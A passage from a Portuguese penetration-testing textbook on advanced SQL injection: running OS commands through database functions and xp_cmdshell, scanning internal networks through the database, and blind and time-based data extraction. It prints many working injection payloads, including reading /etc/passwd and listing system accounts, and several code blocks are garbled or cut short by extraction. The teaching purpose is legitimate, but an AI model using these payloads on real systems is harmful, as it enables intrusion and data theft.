/tmp/lib_postgresqludf_sys.so, sys_bineval LANGUAGE C RETURNS
NULL 8
CREATE OR REPLACE FUNCTION sys_fileread(text) RETURNS text AS 8
/tmp/lib_postgresqludf_sys.so, sys_fileread LANGUAGE C RETURNS 8
NULL ON NULL INPUT IMMUTABLE;-Finalizando, o exemplo abaixo ilustra a exibio do arquivo /etc/passwd, por meio de uma
chamada a sys_eval() via injeo de SQL:
Transact-SQL
Consiste em uma
extenso proprietria
da linguagem SQL
utilizada pelos SGBDs
SQL Server e Sybase.
and 1=2 union select 1,null,sys_eval(cat /etc/passwd)--
SQL Server
Funes definidas por usurio so criadas, em SQL Server, por meio do comando CREATE
FUNCTION e podem ser escritas em Transact-SQL ou, a partir da verso 2005, em qualquer linguagem baseada no arcabouo .NET, graas integrao com o componente
Common Language Runtime (CLR).
Tambm possvel desenvolver procedimentos estendidos, baseados em linguagens como
C e C++, por exemplo, e invoc-los, de dentro das funes. Essa funcionalidade, entretanto,
deixar de ser suportada nas verses futuras, em favor da soluo calcada em .NET.
Essas funes podem ser divididas em duas classes, de acordo com o tipo do valor retornado:
1 Escalar: devolve um valor de qualquer um dos tipos escalares do SQL Server, exceto
text, ntext, image e timestamp.
1 Tabela: um conjunto de linhas, compostas por tipos escalares, devolvido. Por esse
motivo, essa classe de funo pode ser empregada no lugar de vises, apresentando
a vantagem de ser parametrizada.
De modo geral, em SQL Server, grande parte do que se deseja fazer, por meio de funes
de usurio, j disponibilizada pelo extenso conjunto de procedimentos de sistema.
Se por um lado verdade que a maioria dessas rotinas est desabilitada por padro, desde
a verso 2005, por outro, se a conta de aplicao possui privilgios para criao de funes,
CLR
Ambiente de execuo
de cdigo gerenciado,
provido pelo arcabouo
.NET, que traz,
como benefcios,
a possibilidade
de integrao de
programas escritos em
linguagens diversas, o
tratamento uniforme
de excees, um
modelo simplificado
de comunicao
entre componentes,
mecanismos de
segurana e controle
de verses.
provavelmente, tem tambm o poder para ativar os procedimentos que necessitar.
277
Apesar do argumento acima, para a introduo da sintaxe de CREATE FUNCTION segue um

exemplo de funo de usurio bem simples, que compara dois valores numricos e retorna 1,
0 ou -1, se o primeiro argumento for maior, igual ou menor que o segundo, respectivamente.
CREATE FUNCTION compare(@n1 bigint,

@n2 bigint)
RETURNS int
BEGIN
DECLARE @ret int;
IF @n1 > @n2

SET @ret = 1;
ELSE IF @n1 = @n2
SET @ret = 0;
ELSE
SET @ret = -1;
Figura 6.45
Exemplo de funo
de usurio do
tipo escalar para
SQL Server.
RETURN(@ret);
END
Execuo de comandos no sistema operacional

Diversos so os objetivos de se executar comandos no sistema operacional, em um teste de
invaso ou ataque, sendo possvel citar, entre eles: alterao da configurao dos servios
oferecidos e dos mecanismos de proteo instalados, remoo dos rastros deixados por
operaes ilegtimas, extrao de dados para auxiliar a descoberta e explorao de outras
vulnerabilidades, realizao de ataques contra ativos do ambiente e instalao de backdoors.
Backdoor
Quais dessas metas podem ser atingidas depende muito dos privilgios da conta, com a
Mecanismo instalado
em um sistema,
pelo fornecedor ou por
um atacante,
que permite acesso
direto, de maneira
ilegtima, ao ambiente
e informao.
qual o servidor de banco de dados executado, e da configurao do sistema operacional.
MySQL
No h suporte nativo, em MySQL, para a execuo de comandos no sistema operacional.
Para preencher essa lacuna, necessrio estender a funcionalidade do servidor de banco

de dados, por meio de funes de usurio, como a apresentada na seo anterior.
Conforme vimos, dependendo da configurao do ambiente e da maneira como a aplicao
foi desenvolvida, o ataque no fcil de ser realizado.
Oracle
H diversos mtodos que podem ser utilizados em Oracle para executar comandos no
sistema operacional, os quais variam de acordo com a verso empregada. Um problema,
porm, que nenhum deles pode ser usado como expresso, o que, junto com a falta
de suporte a comandos empilhados, inviabiliza a explorao por meio de injeo de SQL
(Clarke, 2009).
278
Para superar essa dificuldade, necessrio encontrar uma rotina em PL/SQL que seja injetvel, mas, nesse caso, uma alternativa melhor consiste em aproveitar a vulnerabilidade para
criar e utilizar a funo de usurio, descrita na seo anterior.
PostgreSQL
PostgreSQL, assim como MySQL, no suporta nativamente a execuo de comandos no
sistema operacional. A soluo para isso, igualmente, consiste na criao de uma funo
de usurio como aquela apresentada na seo anterior.
A grande vantagem do ponto de vista de ataque, em relao ao MySQL, que no h
restries quanto ao diretrio em que a biblioteca gerada deve ser gravada. Isso torna a
explorao nessa plataforma muito mais factvel, desde que a aplicao utilize uma conta
privilegiada para acesso ao SGBD ou que seja possvel escalar privilgios.
SQL Server
Pode-se dizer que o SQL Server, de todos os SGBDs, um dos que mais possuem proce-
dimentos e funes embutidas para interao com o sistema operacional. Devido aos
diversos ataques que ocorreram, valendo-se dessa grande gama de rotinas, a partir
da verso 2005 boa parte delas passou a vir desativada, por padro, embora nenhuma
tenha sido excluda do pacote.
Se desejado, ainda possvel reativ-las, por meio do procedimento sp_configure, desde
que invocado por uma conta administrativa.
Um desses procedimentos, o xp_cmdshell, permite executar programas arbitrrios, baseados em linha de comando (Anley, 2002a). A sintaxe bem simples, conforme se v a seguir:
exec master..xp_cmdshell <comando>;

Quando usado em um ataque de injeo de SQL, para obter a sada do comando executado
necessrio direcionar a sada para um arquivo e, em seguida, extra-lo do servidor, por
meio da tcnica j discutida. Para melhor entender o mtodo, observe o prximo exemplo,
que visa descobrir as contas existentes no sistema operacional do servidor.
O ataque se inicia com a execuo do comando net1 user, que deve ter a sada enviada a
um arquivo:
; exec master..xp_cmdshell net1 user > c:\temp\net1.txt-Procede-se criao da tabela temporria, mas de maneira ligeiramente diferente apresentada anteriormente. Para poder recuperar as linhas, na ordem em que aparecem no
arquivo, deve-se incluir uma coluna sequencial na tabela, que utilizada para ordenao
do resultado. Porm, isso faz com que o nmero de colunas do arquivo difira do da tabela,
meio de um descritor de formato, que pode ser gerado pelo utilitrio bcp. Entretanto, se ele
for executado para a tabela final, contendo as duas colunas, o descritor precisa ser editado
para remoo da coluna de ordenao.
Embora seja factvel efetuar todos esses passos, por meio de um ataque de injeo de SQL,
a tarefa bastante rdua. Assim, pode-se recorrer a um truque, em que o arquivo de formato gerado para uma tabela efmera, com apenas uma nica coluna e, depois, empregado para a tabela final, com duas colunas:
causando um erro na execuo do BULK INSERT. possvel contornar esse problema por
279
; create table temp (data varchar(8000)); 8

exec master..xp_cmdshell bcp master..temp format nul -f 8
c:\temp\format.txt -c -T -Usa -P; 8
drop table temp; 8
create table temp (data varchar(8000),id int identity)-Em seguida, o arquivo importado para a tabela, especificando-se o descritor de formato:
; bulk insert temp from c:\temp\net1.txt with 8

(formatfile=c:\temp\format.txt)-Por fim, os dados so recuperados e a tabela, removida:
and 1=2 union select id,data,null from temp order by 1; drop 8

table temp--
Varredura de redes
muito comum, em cenrios reais, o SGBD residir em uma rede de servidores segregada
das demais por meio de um firewall. Enquanto o acesso a partir de outras redes a esse
segmento controlado, dentro dele, normalmente, no h filtragem nenhuma. Nesse
contexto, injeo de SQL apresenta-se como uma ferramenta muito til, pois como o
cdigo injetado processado no SGBD, possvel acessar outros servidores presentes
na mesma sub-rede, sem nenhuma interferncia do firewall instalado.
Uma estratgia que pode ser adotada para a realizao desse teste:
1 Identificao do endereo IP do servidor e da mscara de rede correspondente.
1 Verificar, por meio do comando ping, se h um servidor ativo e responsivo para cada um
dos endereos da mesma rede.
1 Para cada servidor encontrado, testar as portas que desejar, por meio de uma conexo
via telnet, netcat ou mecanismo nativo do SGBD.
Note que, dependendo do tamanho da rede, impraticvel realizar essa tarefa manualmente, embora no seja difcil automatiz-la. Alm disso, observe que, no segundo passo, a
falta de resposta ao ping no implica, necessariamente, que no exista um servidor com o
endereo sendo testado; possvel, por motivos de segurana, que ele tenha sido configu-
rado para no responder a esse tipo de pacote.
280
MySQL
Para executar, em MySQL, a estratgia de varredura apresentada, necessrio utilizar a
UDF, que permite invocar comandos do sistema operacional.

Os vetores que devem ser injetados nesse processo, a cada passo, decorrem naturalmente
do roteiro de teste.
Inicialmente, o programa ifconfig executado para determinao do IP do servidor:
and 1=2 union select null,null,replace(convert(sys_eval(ifconfig)
,char(8000)), \n, <BR>),null,null,null#

Figura 6.46
Endereos de rede
do servidor MySQL.
A partir do resultado da injeo, ilustrado na Figura 6.46, nota-se que o servidor de banco
de dados est conectado s redes 192.168.107.0/24 e 192.168.213.0/24.
Os testes para deteco de outros servidores ativos devem ser realizados nas duas redes:
Figura 6.48
Resultado da
injeo, quando
o servidor encontrado e responde
ao ping.
and 1=2 union select null,null,replace(convert(sys_eval(ping -c 1
8 192.168.213.1),char(8000)), \n, <BR>),null,null,null#

Essa injeo pode resultar em servidor no encontrado (Figura 6.47), responsivo (Figura 6.48)
e no responsivo.
Os seguintes vetores podem ser empregados para verificar que o servidor 192.168.213.100
est executando o SGBD Oracle (Figura 6.49) e no disponibiliza acesso via Telnet (Figura 6.50).
Figura 6.47
Resultado da
injeo, quando
o servidor no
encontrado.
281
Oracle:
and 1=2 union select null,null,replace(convert(sys_eval(nc -v -w 2
8 192.168.213.100 1521),char(8000)), \n, <BR>),null,null,null#

Telnet:
and 1=2 union select null,null,replace(convert(sys_eval(nc -v -w 2
8 192.168.213.100 23),char(8000)), \n, <BR>),null,null,null#
Oracle
Em Oracle, para efetuar uma varredura na rede interna, tambm possvel seguir os mesmos
passos que em MySQL, bastando ajustar os vetores de teste, de acordo com a sintaxe correta.
Entre as alternativas disponveis esto o uso do pacote UTL_TCP, que permite realizar
Figura 6.49
Oracle detectado no servidor
192.168.213.100.
Figura 6.50
Resposta vazia,
indicando que servio Telnet no est
disponvel.
conexes TCP, e a criao de uma funo de usurio em Java. Em ambos os casos,

necessrio encontrar uma vulnerabilidade em uma rotina escrita em PL/SQL que
permita realizar a injeo, da mesma maneira que nos exemplos de escalada de privilgios e manipulao de arquivos.
Nesse contexto, a Figura 6.51 apresenta um cdigo em Java para varredura de portas em um
nico endereo IP.
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED Scan as

import java.net.Socket;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.lang.StringBuffer;
282
public class Scan {

public static String portScan(String ip) {
Socket socket = new Socket();
StringBuffer sb = new StringBuffer();
InetAddress ia = null;
Figura 6.51
Cdigo-fonte Java
de funo que realiza varredura
de portas.
try {
ia = InetAddress.getByName(ip);
} catch (Exception e)
{
return null;
}
sb.append(Ports on + ip + :\n);
for (int i = 1; i < 65535; i++) {
try {
socket = new Socket();
socket.connect(new InetSocketAddress(ia, i), 300);
sb.append(Integer.toString(i) + \n);
socket.close();
} catch (Exception e) {
}
}
return sb.toString();
}
}
Aps executar a injeo do cdigo no banco de dados Oracle, deve-se criar a funo de
usurio correspondente:

EXECUTE IMMEDIATE 8
RETURN VARCHAR2 8
AS LANGUAGE JAVA 8
NAME Scan.portScan(java.lang.String) return 8
java.lang.String; 8
;END;;END;--, 8
CREATE OR REPLACE FUNCTION PSCAN (ip IN VARCHAR2) 8
0,1,0) from dual-283
E conceder privilgio de execuo para todas as contas do banco:

EXECUTE IMMEDIATE GRANT EXECUTE ON PSCAN TO PUBLIC 8
;END;;END;--, 8
0,1,0) from dual-Terminado tudo isso, muito fcil efetuar uma varredura de portas em um ativo, utilizando
os recursos do servidor de banco de dados, conforme mostrado na Figura 6.52:
and 1=2 union select 1,null,replace(sys.pscan(192.168.213.100), 8

chr(10),<BR>) from dual--
PostgreSQL
Os endereos IP do servidor PostgreSQL e do cliente conectado, no caso a aplicao,
podem ser descobertos por meio das funes inet _server_addr () e inet_client_addr(),
respectivamente.
Se o servidor de aplicao estiver instalado junto com o SGBD, o retorno de ambas as funes
um valor nulo. Se no, retorna-se um valor do tipo inet, que pode ser convertido para texto,
empregando-se a funo host(). Um exemplo de como empreg-las em uma injeo de SQL:
union select 1,host(inet_server_addr()),host(inet_client_addr())-As etapas de identificao de servidores e servios, por sua vez, podem ser cumpridas com
auxlio do mdulo dblink, o mesmo que se usa para testes de fora bruta e dicionrio contra
as contas do banco de dados. A tcnica consiste em tentar conectar-se a um endereo e
284
porta e observar a mensagem de erro devolvida. Segundo Leidecker (2007), dependendo do

texto, chega-se a uma das concluses abaixo:
1 Servidor inativo: ERROR: could not establish connection DETAIL: could not connect to
server: No route to host Is the server running on host 192.168.213.150 and accepting TCP/IP
connections on port 22?
1 Porta fechada: ERROR: could not establish connection DETAIL: could not connect to server:
Connection refused Is the server running on host 192.168.213.100 and accepting TCP/IP
connections on port 23?
Figura 6.52
Resultado da
varredura de
portas no ativo
192.168.213.100.
1 Porta aberta: ERROR: could not establish connection DETAIL: server closed the connection
unexpectedly This probably means the server terminated abnormally before or while
processing the request.
1 Porta aberta ou filtrada: ERROR: could not establish connection DETAIL: timeout expired.
Logo abaixo, encontra-se um exemplo do que injetar na aplicao para a realizao desses testes:
and 1=2 union select 1,null,dblink_connect(host=192.168.213.100 8

port=1521 connect_timeout=5)--
SQL Server
A descoberta do endereo IP do servidor SQL Server pode ser realizada invocando o
programa ipconfig, por meio do procedimento estendido xp_cmdshell.

A sada do ipconfig deve ser direcionada para um arquivo, a partir do qual a informao
desejada extrada, empregando-se a tcnica baseada no comando BULK INSERT.
As etapas seguintes, de identificao de servidores e portas abertas, so efetuadas de
maneira similar ao PostgreSQL. As diferenas residem no uso do comando OPENROWSET, no lugar de dblink_connect(), e nas mensagens de erro geradas, descritas a seguir
(Litchfield et al., 2005):
1 Servidor inativo: [DBNETLIB][ConnectionOpen (Connect()).]SQL Server does not exist
or access denied.
1 Porta fechada: [DBNETLIB][ConnectionOpen (Connect()).]SQL Server does not exist
or access denied.
1 Porta aberta: [DBNETLIB][ConnectionRead (recv()).]General network error. Check
your network documentation.
O vetor de teste abaixo representa um modelo do que deve ser injetado nesse tipo de teste:
; select * from OPENROWSET(SQLOLEDB,uid=sa;pwd=pwd;Network= 8

DBMSSOCN; Address=192.168.213.100,1521;timeout=5,)--
Partio e balanceamento
A tcnica de partio e balanceamento, introduzida por Litchfield (2005), permite injetar
consultas e expresses SQL, no meio de valores fornecidos aplicao, sem se preocupar com o nmero de aspas e parnteses presentes no comando original.
A primeira parte do mtodo consiste em reescrever o argumento de outra maneira,
aplicvel somente a valores textuais e garante um nmero par de aspas, o que evita erros
sintticos decorrentes da falta de equilbrio desses delimitadores.
importante salientar que expresses escritas desse jeito podem ser injetadas em qualquer ponto de um comando, e essa a principal vantagem dessa tcnica.
Considere os seguintes comandos SELECTS, executados por um SQL Server:
dividindo-o em partes, mas sem alterar o valor original. O balanceamento, por sua vez,
285
select abc
select a + bc
select a + (select ) + bc
select a + (select b) + c
Embora escritos diferentemente, todos eles so equivalentes e geram o mesmo resultado,
abc. Observe como a partio do texto inicial permite a insero de uma subconsulta entre
as duas partes. Alm disso, conforme j discutido, note que o nmero de aspas sempre
par e, portanto, balanceado.
A tcnica tambm pode ser aplicada a valores numricos, como se v nos prximos exemplos, que resultam sempre no valor 10:
select 10
select 10 + 0
select 10 + (select 0)
Injeo de SQL s cegas

At agora, vimos diversas tcnicas de injeo de SQL que dependem da exibio do
resultado da consulta e, tambm, de mensagens de erro verbosas. Mesmo que essas

condies no sejam satisfeitas, se a aplicao constri os comandos SQL, concatenando-os com valores no tratados de usurio, ainda possvel explor-la por meio de
uma tcnica chamada de injeo de SQL s cegas (Spett, 2002; Clarke, 2009).
Tcnica bsica
Considere uma aplicao cuja tela inicial pode ser observada na Figura 6.53, que possui
um nico campo de entrada, no qual possvel digitar parte do nome de um autor. Como
resposta a uma requisio, o sistema indica o nmero de artigos encontrados no acervo da
instituio que tenham sido escritos por pessoas cujos nomes contenham o texto informado
pelo usurio. Observe que os ttulos dos artigos no so apresentados pela aplicao como
resultado da pesquisa realizada.
286
Figura 6.53
Aplicao de exemplo para injeo de
SQL s cegas.
Ao digitar uma aspa simples no campo e clicar em Contar artigos, a mensagem genrica
Erro na execuo da consulta! exibida. Como se sabe, isso um indicativo de que a aplicao pode ser vulnervel injeo de SQL. De modo a confirmar o defeito e identificar o
SGBD utilizado, pode-se empregar a tcnica de partio e balanceamento para submeter
vetores especficos de cada sistema de banco de dados.
Aquele valor que no resultar em erro fornece as respostas desejadas, pois indica que o
dado foi entendido e processado pelo servidor.
Com isso em mente, os seguintes vetores de teste podem ser utilizados:
1 MySQL: a
1 Oracle: a || bitand(1,1) ||
1 PostgreSQL: a || pg_sleep(5) ||
1 SQL Server: a +
No caso da aplicao de exemplo, somente o vetor de SQL Server injetado com sucesso e,
assim, todas as construes subsequentes devem ser feitas respeitando as especificidades
desse banco de dados.
Prosseguindo com o teste, devem ser submetidas consultas vlidas e observados os
resultados devolvidos pela aplicao. Para os textos a e abc, obtm-se, respectivamente, as mensagens 2 artigo(s) encontrado(s)! e 0 artigo(s) encontrado(s)!.
A partir disso, razovel concluir que o SELECT construdo pelo sistema tem a forma:
sql = select count(*) from artigos where autor like % + sAutor +

%
De modo que autor like %a% avaliado como verdadeiro, para duas linhas da tabela,
enquanto que autor like %abc% falso para todas. Tal constatao permite incluir
perguntas booleanas clusula WHERE, de duas maneiras distintas, com base na
primeira expresso:
1 Se adicionarmos and <pergunta booleana> ao final do WHERE, a expresso autor like
%a% and <pergunta booleana> continua sendo avaliada como verdadeira para duas
linhas, se e somente se, <pergunta booleana> for verdadeira. Assim, pelo nmero de
artigos encontrados, possvel inferir a resposta da pergunta realizada.
1 A segunda construo adota a tcnica de partio e balanceamento para incluir a pergunta no meio da entrada, por meio de um CASE. Se a resposta for verdadeira, nada
adicionado ao valor a, seno, a cadeia bc inserida. Desse modo, novamente, pelo
nmero informado de artigos, pode-se concluir a resposta da pergunta feita.
a
a +
a + (case <pergunta> when <verdadeira> then else bc end) +
Comparando as opes, a primeira tem a vantagem de produzir vetores mais curtos,
enquanto a segunda pode ser empregada em qualquer ponto de injeo, sem se preocupar
lho, a soluo superior a ltima.
Para continuar o exemplo, vamos supor, agora, que se deseja descobrir a conta utilizada
pela aplicao para acessar o banco de dados.
com aspas e parnteses. De modo geral, se o tamanho do vetor de teste no for um empeci-
287
O primeiro passo consiste na determinao do comprimento do identificador de usurio,
que pode ser realizado perguntando se ele tem um tamanho especfico:
a% and len(system_user)=1-0 artigo(s) encontrado(s)!

A partir do nmero de artigos, sabe-se que a expresso len(system_user=1) foi avaliada
como falsa. O processo deve ser repetido at a obteno de uma resposta positiva:

A ltima pergunta realizada a correta e indica que o tamanho do identificador igual a trs.
Continuando o processo, cada um desses trs caracteres deve, ento, ser comparado
com os valores aceitos na composio de um nome de conta. A funo substring() deve

ser utilizada, nessa tarefa, para trabalhar os caracteres, de modo individual, enquanto a
funo lower() empregada para que apenas letras minsculas sejam consideradas.
A partir disso, iniciando com a primeira posio, as seguintes perguntas so efetuadas:
a% and substring(lower(system_user),1,1)=a-0 artigo(s) encontrado(s)!

a% and substring(lower(system_user),1,1)=b-0 artigo(s) encontrado(s)!
a% and substring(lower(system_user),1,1)=c-0 artigo(s) encontrado(s)!
a% and substring(lower(system_user),1,1)=d-0 artigo(s) encontrado(s)!
a% and substring(lower(system_user),1,1)=e-2 artigo(s) encontrado(s)!
Conclui-se, portanto, que o primeiro caractere do identificador de conta a letra e. Ao execu-
288
tar o mesmo algoritmo, para a segunda e a terceira posies, obtm-se, respectivamente, s e r,

como se v abaixo. Logo, a conta com a qual a aplicao se conecta ao banco de dados esr.
Segunda posio:
...
a% and substring(lower(system_user),2,1)=r-0 artigo(s) encontrado(s)!
a% and substring(lower(system_user),2,1)=s-2 artigo(s) encontrado(s)!

Terceira posio:
...
a% and substring(lower(system_user),3,1)=q-0 artigo(s) encontrado(s)!
a% and substring(lower(system_user),3,1)=r-2 artigo(s) encontrado(s)!
Uma rpida anlise do desempenho dessa tcnica pode ser feita com base no nmero
total de requisies que foram necessrias para recuperao do nome de conta. No caso,
para a primeira posio foram 5; para a segunda, 19, e, para a terceira, 18, totalizando 42
solicitaes. Supondo que cada caractere possa ser escolhido somente entre as letras do
alfabeto, em mdia devem ser efetuadas 13 requisies. Esse cenrio no ruim, porm,
se o dado for binrio, 256 valores so possveis e, com isso, o nmero mdio de requisies
aumenta para 128. Embora seja possvel paraleliz-las, elas representam um volume grande
de informaes sendo enviadas ao servidor, e, assim, necessrio encontrar uma alternativa melhor. Visando satisfazer esse objetivo, h duas abordagens que podem ser adotadas:
busca binria e mtodo bit-a-bit (Clarke, 2009).
Busca binria
A busca binria permite identificar o valor de um byte com o total de oito perguntas.
A ideia bem simples e consiste em dividir o domnio de busca atual em duas metades e
determinar em qual delas o valor se encontra. Isso permite descartar, com uma pergunta, metade dos valores que restaram para pesquisa. O procedimento aplicado,
recursivamente, parte que contm o nmero procurado at que sobre uma partio
com um nico elemento.
Por exemplo, considere que o valor X que se deseja descobrir 65, que o cdigo ASCII da
letra A. Considerando que o domnio inicial compreende todos os valores entre 0 e 255, a
pergunta inicial feita com o nmero 127, que ocupa a mediana do intervalo. Todos os passos do teste podem ser examinados no roteiro abaixo:
1 X > 127? No, logo o nmero pertence ao intervalo [0..127], cuja mediana 63.
1 X > 63? Sim, logo o nmero pertence ao intervalo [64..127], cuja mediana 95.
1 X > 64? Sim, logo o nmero s pode ser 65, pois maior que 64 e menor ou igual a 65.
Para utilizar essa tcnica, com injeo de SQL s cegas, necessrio empregar a funo
ascii(), que devolve o cdigo ASCII do caractere passado como argumento. Considere o
exemplo anterior, usado para descobrir a conta de acesso ao banco de dados.
289
Ao aplicar a ele esse mtodo, o caractere na primeira posio, e (ASCII = 101), identificado
com as seguintes perguntas:
a% and ascii(substring(lower(system_user),1,1))>127-0 artigo(s) encontrado(s)! /* Falso: intervalo [0..127] */

a% and ascii(substring(lower(system_user),1,1))>63-2 artigo(s) encontrado(s)! /* Verdadeiro: intervalo [64..127] */
a% and ascii(substring(lower(system_user),1,1))>95-2 artigo(s) encontrado(s)! /* Verdadeiro: intervalo [96..127] */
a% and ascii(substring(lower(system_user),1,1))>100-2 artigo(s) encontrado(s)! /* Verdadeiro: X = 101 */
Fica evidente que essa tcnica bem mais eficiente que a anterior, pois requer apenas oito
requisies para recuperao de um byte, contra 128, da outra, no caso mdio. Apesar
disso, a busca binria apresenta uma pequena desvantagem, que a impossibilidade de
paralelizar as requisies, dada a dependncia existente entre elas.
Antes de encerrar este tpico, convm observar que a funo lower() no necessria para
essa tcnica e nem para a bit-a-bit, uma vez que todos os valores possveis de um byte so
considerados. No caso, ela foi mantida apenas para ficar consistente com o exemplo do
mtodo linear, no qual, realmente, o uso dela representa uma vantagem.
Mtodo bit-a-bit
O mtodo bit-a-bit tambm realiza apenas oito requisies para recuperar o valor de um
byte, porm, tem a vantagem, sobre a busca binria, de poder ser paralelizado.
290
A tcnica consiste em extrair o valor de cada um dos bits do byte desejado por meio de um
AND bit-a-bit. Lembrando que o AND resulta em 1 somente quando ambos os operandos
forem 1. Para testar o valor do quinto bit do byte X, por exemplo, pode-se verificar a igualdade X and 32 = 32. Se, e somente se, ela for verdadeira, o bit testado est ligado.
De modo geral, numerando os bits de 0 a 7, com 0 sendo o menos significativo, o teste
do k-simo bit de um byte X qualquer feito por meio da comparao X and 2 = 2 .
k
Para ficar mais claro, vamos aplicar o mtodo ao exemplo anterior:
a% and ascii(substring(lower(system_user),1,1))&128=128-0 artigo(s) encontrado(s)! /* Falso: bit 7 zero */

a% and ascii(substring(lower(system_user),1,1))&64=64-2 artigo(s) encontrado(s)! /* Verdadeiro: bit 6 um */
A partir das respostas obtidas, possvel escrever a sequncia de bits 01100101, que igual
ao valor decimal 101, conforme esperado.
Inferncia baseada em tempo

Considere o caso em que a injeo de SQL no produz nenhum efeito sobre o contedo
que exibido em resposta requisio. Por esse motivo, pode parecer, em um primeiro
instante, que no h meios de explor-la, mas isso pode ser realizado de fato a partir de
um canal secundrio. O fundamento por trs disso, para inferncia baseada em tempo,
consiste na gerao de uma pausa no processamento, se e somente se, uma dada condio, que corresponde pergunta que se quer fazer, for satisfeita.
Obviamente, o tempo de parada deve ser perceptvel, de modo a ser possvel discernir entre
os dois estados.
Esse mtodo pode ser usado tanto com a tcnica de busca binria quanto com a bit-a-bit, e,
ceamento. O motivo disso que, algumas vezes, o ponto de injeo em aplicaes dessa
natureza ocorre em comandos INSERT e, portanto, a pergunta deve ser includa como parte
da expresso sendo injetada, sem comentrio de final de linha. A falta desse cuidado gera
erro sinttico, fazendo com que o teste no seja efetuado com sucesso.
Para exemplificar, considere uma aplicao baseada em PostgreSQL e que o objetivo seja
extrair a conta utilizada para acesso ao banco de dados. Nesse cenrio, os seguintes valores
so injetados para a descoberta do primeiro byte, empregando a tcnica bit-a-bit:
de modo geral, melhor que os vetores sejam construdos por meio de partio e balan-
291
a || (case ascii(substr(user,1,1)) & 128 when 128 then pg_sleep(5) 8

else end) ||
else end) ||
/* Pausa */

else end) ||
/* Pausa */

else end) ||
/* Pausa */

else end) ||
else end) ||
else end) ||
else end) ||
Com base nas injees que resultaram em pausa, obtm-se a sequncia de bits 01110000,
cujo valor decimal 112, o qual o cdigo ASCII da letra p. fcil observar, a partir da lista
acima, que a tcnica de partio e balanceamento, realmente, gera vetores mais longos.
Automao
Executar manualmente as tcnicas de injeo de SQL s cegas est longe de ser uma
tarefa trivial, uma vez que cada requisio devolve, normalmente, apenas 1 bit de
informao. Consequentemente, a extrao de dados teis implica a realizao de vrios
milhares de requisies, no melhor caso.
Felizmente, existem diversas ferramentas que podem auxiliar o analista de segurana
na execuo desses testes. Entre os diversos exemplares esto: Absinthe, SQLBrute,
Sqlninja e sqlmap.
O utilitrio sqlmap, j introduzido, tambm pode ser utilizado em ataques baseados em inje-
o de SQL s cegas. Para isso, nenhuma opo adicional precisa ser selecionada, embora seja
292
possvel especificar a tcnica que se deseja empregar, por meio da opo --technique=. Um
exemplo de uso, para extrao do nome do banco de dados, est mostrado na Figura 6.54.
$ sqlmap.py -u mssqlbi.esr.rnp.br --current-db --forms
sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net
[*] starting at: 17:22:44

...
[17:23:56] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Linux Fedora
web application technology: PHP 5.3.6, Apache 2.2.17
back-end DBMS: Microsoft SQL Server 2000
[17:23:56] [INFO] fetching current database
[17:23:56] [INFO] retrieved:
[17:24:01] [WARNING] adjusting time delay to 1 second
master
current database:
master
[*] shutting down at: 17:25:47
A ferramenta Sqlninja distribuda sob licena GPLv2 e tem por objetivo explorar aplicaes
vulnerveis injeo de SQL, que utilizam o SQL Server como servidor de banco de dados.
Pode ser executada em plataformas Linux, FreeBSD e MacOS X, desde que um interpretador
Perl esteja instalado, alm de alguns mdulos especficos da linguagem. Permite realizar
diversos ataques, incluindo: deteco do SGBD; identificao da conta utilizada pela
aplicao; fora bruta contra a senha da conta sa; escalada de privilgios no SGBD e no
sistema operacional; criao de procedimento xp_cmdshell personalizado, para o caso do
original estar desabilitado; e envio de executveis, entre muitos outros.
Toda a configurao da ferramenta realizada por meio de parmetros definidos no arquivo
sqlninja.conf. Em uma configurao bsica, devem ser especificados, pelo menos, o nome
de domnio da aplicao; a porta para conexo; pgina vulnervel; tipo de requisio HTTP;
parmetros que devem ser enviados; e parmetro injetvel. Nota-se, com isso, que no faz
parte dos objetivos do Sqlninja encontrar as vulnerabilidades, mas explor-las somente.
Alm disso, necessrio um certo grau de conhecimento, sobre testes de invaso, para
utilizar todas as funcionalidades que a ferramenta disponibiliza.
Um exemplo de sesso do Sqlninja, contra uma aplicao vulnervel injeo de SQL s
cegas, pode ser visto na Figura 6.55.
Figura 6.54
Extrao do nome
do banco de dados,
usando a ferramenta sqlmap, com
tcnica de injeo
de SQL s cegas.
293
~$ sqlninja -m f
Sqlninja rel. 0.2.5
Copyright (C) 2006-2010 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file................
[+] Port 80. Assuming cleartext
[+] Target is: mssqlbi.esr.rnp.br
What do you want to discover ?
0 - Database version (2000/2005)
1 - Database user
2 - Database user rights
3 - Whether xp_cmdshell is working
4 - Whether mixed or Windows-only authentication is used
5 - Whether SQL Server runs as System
(xp_cmdshell must be available)
a - All of the above
h - Print this menu
q - exit
> 0
[+] Checking SQL Server version...
Target: Microsoft SQL Server 2000
> 1
[+] Checking whether we are sysadmin...
No, we are not sa.... :/
[+] Finding dbuser length...
Got it ! Length = 3
[+] Now going for the characters........
294
DB User is....: esr

> 2
[+] Checking whether user is member of sysadmin server role....
You are an administrator !
> q
Figura 6.55
Extrao de informaes sobre o
banco de dados,
usando a ferramenta Sqlninja, com
tcnica de injeo
de SQL s cegas.
Ataque de injeo de SQL
Como possvel executar um ataque de injeo de SQL quando a aplicao no exibe o
resultado da consulta?
Injeo de SQL de segunda ordem

Injeo de SQL de segunda ordem, tambm chamada de injeo de SQL armazenada,
difere das tcnicas que vimos at aqui, porque a explorao no acontece no momento
da injeo, mas, sim, posteriormente, quando o valor injetado reutilizado pela aplicao.
Por consequncia, o ponto de injeo se localiza em um comando INSERT, em vez de um
SELECT, e no causa nenhum efeito imediato, devido a filtros instalados na aplicao.
O problema somente surge porque o valor persistido utilizado em ocasio ulterior, sem
a sanitizao necessria. Considere uma aplicao que permite aos usurios registrarem
novas contas, e que um filtro est instalado nas telas de autenticao e de cadastro, de
modo a duplicar toda aspa encontrada no identificador de usurio (Anley, 2002a). O objetivo
disso, segundo o inocente desenvolvedor, evitar ataques de injeo de SQL, iniciados com
aspa simples, e, ao mesmo tempo, permitir que sejam utilizadas contas para nomes, como
OReilly e OConnor.
Durante a criao de uma nova conta, o seguinte comando executado:
insert into users values(.str_replace(, , $userid).,

.$senha.)
Tal que $userid e $senha so variveis contendo valores fornecidos pelo usurio na tela de
cadastro. Imagine que o usurio entre, respectivamente, com os textos admin-- e senha.
Isso faz com que o seguinte comando seja executado:
insert into users values(admin--, senha)

